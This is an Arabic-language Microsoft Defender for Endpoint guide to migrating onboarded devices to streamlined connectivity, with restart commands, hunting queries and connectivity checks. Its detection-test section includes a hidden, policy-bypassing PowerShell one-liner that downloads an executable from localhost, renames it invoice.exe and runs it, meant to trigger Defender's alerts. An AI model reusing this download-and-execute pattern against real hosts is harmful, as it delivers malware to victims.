ترحيل الأجهزة لاستخدام أسلوب الاتصال المبسط

توضح هذه المقالة كيفية ترحيل (إعادة إلحاق) الأجهزة التي تم إلحاقها مسبقا ب Defender لنقطة النهاية لاستخدام أسلوب اتصال الجهاز المبسط. لمزيد من المعلومات حول الاتصال المبسط، راجع إلحاق الأجهزة باستخدام الاتصال المبسط. يجب أن تفي الأجهزة بالمتطلبات الأساسية المدرجة في الاتصال المبسط.

في معظم الحالات، لا يكون إلغاء إلحاق الجهاز الكامل مطلوبا عند إعادة الإلحاق. يمكنك تشغيل حزمة الإلحاق المحدثة وإعادة تشغيل جهازك لتبديل الاتصال. راجع المعلومات التالية للحصول على تفاصيل حول أنظمة التشغيل الفردية.

هام

القيود والمشكلات المعروفة:

  • بالنسبة إلى عمليات ترحيل الجهاز (إعادة الإلحاق): لا يلزم إلغاء الإلحاق للتبديل إلى أسلوب اتصال مبسط. بمجرد تشغيل حزمة الإلحاق المحدثة، يلزم إعادة تشغيل جهاز كامل لأجهزة Windows وإعادة تشغيل الخدمة لنظام التشغيل macOS Linux. لمزيد من المعلومات، راجع التفاصيل المضمنة في هذه المقالة.
  • لا تدعم الإصدارات Windows 10 1607 و1703 و1709 و1803 إعادة الإلحاق. إلغاء الإلحاق أولا ثم الإلحاق باستخدام الحزمة المحدثة. تتطلب هذه الإصدارات أيضا قائمة عناوين URL أطول.
  • الأجهزة التي تشغل عامل MMA غير مدعومة ويجب أن تستمر في استخدام أسلوب إلحاق MMA.

ملاحظة

يمكن استخدام أداة توزيع Defender لنشر أمان نقطة نهاية Defender على أجهزة Windows وأجهزة Linux. الأداة هي تطبيق خفيف الوزن ومحدث ذاتيا يبسط عملية التوزيع. لمزيد من المعلومات، راجع توزيع أمان نقطة النهاية Microsoft Defender على أجهزة Windows باستخدام أداة توزيع Defenderونشر أمان نقطة النهاية Microsoft Defender على الأجهزة Linux باستخدام أداة توزيع Defender (معاينة).

ترحيل الأجهزة باستخدام الأسلوب المبسط

استخدم الإرشادات التالية لترحيل الأجهزة التي تم إلحاقها مسبقا إلى أسلوب الاتصال المبسط لكل نظام تشغيل وأداة توزيع مدعومة.

مراجعة توصيات الترحيل قبل تبديل أساليب الاتصال

استخدم التوصيات التالية لتخطيط إطلاق الترحيل:

  • ابدأ صغيرا. يوصى بالبدء بمجموعة صغيرة من الأجهزة أولا. قم بتطبيق كائن ثنائي كبير الحجم للإلحاق باستخدام أي من أدوات التوزيع المدعومة، ثم راقب الاتصال. إذا كنت تستخدم نهج إلحاق جديد، لمنع التعارضات، فتأكد من استبعاد الجهاز من أي نهج إعداد موجودة أخرى.

  • التحقق من الصحة والمراقبة. بعد إعداد المجموعة الصغيرة من الأجهزة، تحقق من أن الأجهزة قد تم إلحاقها بنجاح وتتواصل مع الخدمة.

  • الترحيل الكامل. في هذه المرحلة، يمكنك طرح الترحيل تدريجيا إلى مجموعة أكبر من الأجهزة. لإكمال الترحيل، يمكنك استبدال نهج الإلحاق السابقة وإزالة عناوين URL القديمة من جهاز الشبكة.

التحقق من صحة المتطلبات الأساسية للجهاز قبل المتابعة مع أي عمليات ترحيل. يعتمد دليل الترحيل هذا على إلحاق الأجهزة باستخدام اتصال مبسط من خلال التركيز على ترحيل الأجهزة الموجودة.

لإعادة إلحاق الأجهزة، تحتاج إلى استخدام حزمة الإعداد المبسطة. لمزيد من المعلومات حول كيفية الوصول إلى الحزمة، راجع الاتصال المبسط.

اعتمادا على نظام التشغيل، قد تتطلب عمليات الترحيل إعادة تشغيل الجهاز أو إعادة تشغيل الخدمة بمجرد تطبيق حزمة الإلحاق:

  • Windows: إعادة تشغيل الجهاز

  • macOS: أعد تشغيل الجهاز أو أعد تشغيل خدمة Defender لنقطة النهاية عن طريق تشغيل:

    1. sudo launchctl unload /Library/LaunchDaemons/com.microsoft.fresno.plist
    2. sudo launchctl load /Library/LaunchDaemons/com.microsoft.fresno.plist
  • Linux: أعد تشغيل خدمة Defender لنقطة النهاية عن طريق تشغيل:sudo systemctl restart mdatp

يسرد الجدول التالي إرشادات الترحيل لأدوات الإلحاق المتوفرة استنادا إلى نظام تشغيل الجهاز.

استخدم الخيارات التالية لترحيل أجهزة Windows 10 Windows 11 إلى أسلوب الاتصال المبسط.

ترحيل أجهزة Windows 10 Windows 11

هام

لا تدعم الإصدارات Windows 10 1607 و1703 و1709 و1803 إعادة الإلحاق. لترحيل الأجهزة الموجودة، تحتاج إلى إلغاء الإعداد بالكامل وإلحاقها باستخدام حزمة الإعداد المبسطة.

للحصول على معلومات عامة حول إلحاق أجهزة عميل Windows، راجع إلحاق عميل Windows.

تأكد من استيفاء المتطلبات الأساسية: المتطلبات الأساسية لاستخدام الأسلوب المبسط.

ترحيل الأجهزة باستخدام برنامج نصي محلي

اتبع الإرشادات الواردة في البرنامج النصي المحلي (حتى 10 أجهزة) باستخدام حزمة الإعداد المبسطة. بعد إكمال خطوات إلحاق البرنامج النصي المحلي، يجب إعادة تشغيل الجهاز لاتصال الجهاز للتبديل.

ترحيل الأجهزة باستخدام نهج المجموعة

اتبع الإرشادات الواردة في نهج المجموعة باستخدام حزمة الإعداد المبسطة. بعد إكمال خطوات إعداد نهج المجموعة، يجب إعادة تشغيل الجهاز لاتصال الجهاز للتبديل.

ترحيل الأجهزة باستخدام Microsoft Intune

اتبع الإرشادات الواردة في Intune باستخدام حزمة الإعداد المبسطة. يمكنك استخدام خيار "auto from connector"؛ ومع ذلك، لا يقوم خيار "auto from connector" بإعادة تطبيق حزمة الإعداد تلقائيا. إنشاء نهج إلحاق جديد واستهداف مجموعة اختبار أولا. بعد إكمال خطوات إلحاق Intune، يجب إعادة تشغيل الجهاز لاتصال الجهاز للتبديل.

ترحيل الأجهزة باستخدام Microsoft Configuration Manager

اتبع الإرشادات الواردة في Configuration Manager.

ترحيل أجهزة VDI باستخدام الأسلوب المبسط

استخدم الإرشادات في إلحاق أجهزة البنية الأساسية لسطح المكتب الظاهري (VDI) غير المستمرة. بعد إكمال خطوات إلحاق VDI، يجب إعادة تشغيل الجهاز لاتصال الجهاز للتبديل.

التحقق من اتصال الجهاز بطريقة مبسطة للأجهزة التي تم ترحيلها

يمكنك استخدام الطرق التالية للتحقق من أنك قمت بتوصيل أجهزة Windows بنجاح:

بالنسبة إلى macOS و Linux، يمكنك استخدام الطرق التالية:

  • اختبارات اتصال MDATP
  • التعقب باستخدام التتبع المتقدم في Microsoft Defender
  • تشغيل الاختبارات لتأكيد الاتصال بخدمات Defender لنقطة النهاية

استخدام Defender for Endpoint Client Analyzer (Windows) للتحقق من صحة الاتصال بعد الإلحاق لنقاط النهاية التي تم ترحيلها

بمجرد الإلحاق، قم بتشغيل MDE Client Analyzer للتأكد من اتصال جهازك بعناوين URL المحدثة المناسبة.

قم بتنزيل أداة محلل العميل Microsoft Defender لنقطة النهاية حيث يتم تشغيل أداة استشعار Defender لنقطة النهاية.

اتبع خطوات التحقق من صحة اتصال العميل في التحقق من اتصال العميل بخدمة Microsoft Defender لنقطة النهاية. يستخدم البرنامج النصي تلقائيا حزمة الإعداد التي تم تكوينها على الجهاز (يجب أن يكون إصدارا مبسطا) لاختبار الاتصال.

تأكد من إنشاء الاتصال بعناوين URL المناسبة.

التعقب باستخدام التتبع المتقدم في Microsoft Defender

يمكنك استخدام التتبع المتقدم في مدخل Microsoft Defender لعرض حالة نوع الاتصال.

تم العثور على حالة نوع الاتصال في جدول DeviceInfo ضمن العمود "ConnectivityType":

  • اسم العمود: نوع الاتصال
  • القيم المحتملة: <blank>، مبسطة، Standard
  • نوع البيانات: سلسلة
  • الوصف: نوع الاتصال من الجهاز إلى السحابة

بمجرد ترحيل الجهاز لاستخدام الأسلوب المبسط وإنشاء الجهاز اتصالا ناجحا مع أمر EDR & قناة التحكم، يتم تمثيل القيمة على أنها "مبسطة".

إذا قمت بنقل الجهاز مرة أخرى إلى الأسلوب العادي، تكون القيمة "قياسية".

بالنسبة للأجهزة التي لم تحاول إعادة الإلحاق، تظل القيمة فارغة.

التعقب محليا على جهاز من خلال Windows عارض الأحداث

يمكنك استخدام سجل تشغيل SENSE الخاص ب Windows عارض الأحداث للتحقق محليا من صحة الاتصالات باستخدام النهج المبسط الجديد. يتعقب معرف حدث SENSE 4 اتصالات EDR الناجحة.

افتح سجل أحداث خدمة Defender لنقطة النهاية باستخدام الخطوات التالية:

  1. في قائمة Windows، حدد البدء، ثم اكتب عارض الأحداث. ثم حدد عارض الأحداث.

  2. في قائمة السجل، ضمن ملخص السجل، مرر لأسفل حتى ترى Microsoft-Windows-SENSE/Operational. انقر نقرا مزدوجا فوق العنصر لفتح السجل.

    لقطة شاشة عارض الأحداث مع قسم ملخص السجل

    يمكنك أيضا الوصول إلى السجل عن طريق توسيع Applications and Services Logs>Microsoft>Windows>SENSE وتحديد Operational.

  3. يتعقب معرف الحدث 4 الاتصالات الناجحة مع قناة التحكم في أمر Defender for Endpoint &. تحقق من الاتصالات الناجحة باستخدام عنوان URL المحدث. على سبيل المثال:

    Contacted server 6 times, all succeeded, URI: <region>.<geo>.endpoint.security.microsoft.com.
    <EventData>
     <Data Name="UInt1">6</Data>
     <Data Name="Message1">https://<region>.<geo>.endpoint.security.microsoft.com>
    </EventData>
    
  4. تحتوي الرسالة 1 على عنوان URL الذي تم الاتصال به. تأكد من أن الحدث يتضمن عنوان URL المبسط (endpoint.security.microsoft.com).

  5. يتعقب معرف الحدث 5 الأخطاء إذا كان ذلك ممكنا.

ملاحظة

SENSE هو الاسم الداخلي المستخدم للإشارة إلى أداة الاستشعار السلوكية التي تعمل على Microsoft Defender لنقطة النهاية.
تظهر الأحداث المسجلة بواسطة الخدمة في السجل.
لمزيد من المعلومات، راجع مراجعة الأحداث والخطأ باستخدام عارض الأحداث.

تشغيل الاختبارات لتأكيد الاتصال بخدمات Defender لنقطة النهاية

بمجرد إلحاق الجهاز ب Defender لنقطة النهاية، تحقق من استمرار ظهوره في مخزون الجهاز. يجب أن يظل DeviceID كما هو.

تحقق من علامة التبويب المخطط الزمني لصفحة الجهاز للتأكد من تدفق الأحداث من الجهاز.

اختبار اتصال Live Response

تأكد من أن Live Response تعمل على جهاز الاختبار الخاص بك. اتبع الإرشادات الواردة في التحقيق في الكيانات على الأجهزة التي تستخدم الاستجابة المباشرة.

تأكد من تشغيل أمرين أساسيين بعد الاتصال لتأكيد الاتصال (مثل القرص المضغوط والمهام والاتصال).

اختبار التحقيق التلقائي والاتصال للاستجابة

تأكد من أن التحقيق والاستجابة التلقائيين يعملان على جهاز الاختبار الخاص بك: تكوين قدرات التحقيق والاستجابة التلقائية.

بالنسبة لمختبرات اختبار وقت تشغيل التكامل التلقائي، انتقل إلى Microsoft Defender XDR>Evaluations & Tutorials Tutorials>& Tutorials Simulations>>Automated Investigation tutorials.

اختبار اتصال الحماية المقدمة من السحابة

تحقق من أن اتصال شبكة حماية السحابة يعمل:

في موجه أوامر غير مقيد (نافذة موجه الأوامر التي فتحتها عن طريق تحديد تشغيل كمسؤول)، قم بتشغيل الأوامر التالية:

تلميح

يغير الأمر الأول الدليل إلى أحدث إصدار من <إصدار> النظام الأساسي لمكافحة البرامج الضارة في %ProgramData%\Microsoft\Windows Defender\Platform\<antimalware platform version>. إذا لم يكن هذا المسار موجودا، فإنه ينتقل إلى %ProgramFiles%\Windows Defender.

(set "_done=" & if exist "%ProgramData%\Microsoft\Windows Defender\Platform\" (for /f "delims=" %d in ('dir "%ProgramData%\Microsoft\Windows Defender\Platform" /ad /b /o:-n 2^>nul') do if not defined _done (cd /d "%ProgramData%\Microsoft\Windows Defender\Platform\%d" & set _done=1)) else (cd /d "%ProgramFiles%\Windows Defender")) >nul 2>&1

MpCmdRun.exe -ValidateMapsConnection

لمزيد من المعلومات حول MpCmdRun، راجع تكوين وإدارة برنامج الحماية من الفيروسات Microsoft Defender باستخدام أداة سطر الأوامر MpCmdRun.

كتلة الاختبار من النظرة الأولى

اتبع التعليمات التوضيحية ل Block at First Sight (BAFS) في العرض التوضيحي Microsoft Defender لنقطة النهاية Block at First Sight (BAFS).

اختبار SmartScreen

اتبع إرشادات العرض التوضيحي SmartScreen على صفحة Microsoft Defender SmartScreen Demo (msft.net).

اختبار الكشف عن PowerShell

  1. على جهاز Windows، أنشئ مجلدا: C:\test-MDATP-test.

  2. افتح موجه الأوامر كمسؤول.

  3. في نافذة موجه الأوامر، قم بتشغيل أمر PowerShell التالي:

    powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
    

بعد تشغيل الأمر، يتم إغلاق نافذة موجه الأوامر تلقائيا. إذا نجحت، يتم وضع علامة على اختبار الكشف على أنه مكتمل.

بالنسبة إلى macOS و Linux، يمكنك استخدام الطرق التالية:

  • اختبارات اتصال MDATP
  • التعقب باستخدام التتبع المتقدم في Microsoft Defender
  • تشغيل الاختبارات لتأكيد الاتصال بخدمات Defender لنقطة النهاية

اختبار اتصال MDATP (macOS Linux)

التشغيل mdatp health --details edr للتأكيد edr_partner_geo_location متاح. يجب أن تكون القيمة حيث يكون GW_<geo> "الموقع الجغرافي" هو الموقع الجغرافي للمستأجر الخاص بك.

قم بتشغيل اختبار اتصال mdatp. تأكد من وجود نمط URL المبسط. يجب أن تتوقع اثنين ل '\storage'، أحدهما ل '\mdav'، والآخر ل '\xplat'، والآخر ل '/packages'.

على سبيل المثال: https://mdav.us.endpoint.security.microsoft.com/storage

التعقب باستخدام التتبع المتقدم في Microsoft Defender

قم بتشغيل الاستعلام التالي لسرد الأجهزة المإلحاقة وإظهار أحدث نوع اتصال تم الإبلاغ عنه لكل جهاز (الحد 30 ألف):

DeviceInfo
| where OnboardingStatus == "Onboarded"
| summarize arg_max(ConnectivityType, Timestamp) by DeviceName

قم بتشغيل الاستعلام التالي لعرض عدد الأجهزة المإلحاقة المجمعة حسب النظام الأساسي لنظام التشغيل ونوع الاتصال، والتي يتم عرضها كمخطط شريطي:

DeviceInfo
| where OnboardingStatus == "Onboarded"
| summarize arg_max(ConnectivityType, Timestamp, OSPlatform) by DeviceName
| summarize count() by OSPlatform, ConnectivityType
| render columnchart 

استخدام Defender for Endpoint Client Analyzer (عبر النظام الأساسي) للتحقق من صحة الاتصال لنقاط النهاية التي تم ترحيلها حديثا

قم بتنزيل محلل العميل وتشغيله لنظام التشغيل macOS أو Linux. لمزيد من المعلومات، راجع تنزيل محلل العميل وتشغيله.

  1. قم بتشغيل mdeclientanalyzer.cmd -o <path to cmd file> من داخل المجلد MDEClientAnalyzer. يستخدم الأمر معلمات من حزمة الإعداد لاختبار الاتصال.

  2. تشغيل mdeclientanalyzer.cmd -g <GW_US, GW_UK, GW_EU> (حيث تكون المعلمة من GW_US، GW_EU، GW_UK). يشير GW إلى الخيار المبسط. تشغيل مع الموقع الجغرافي للمستأجر القابل للتطبيق.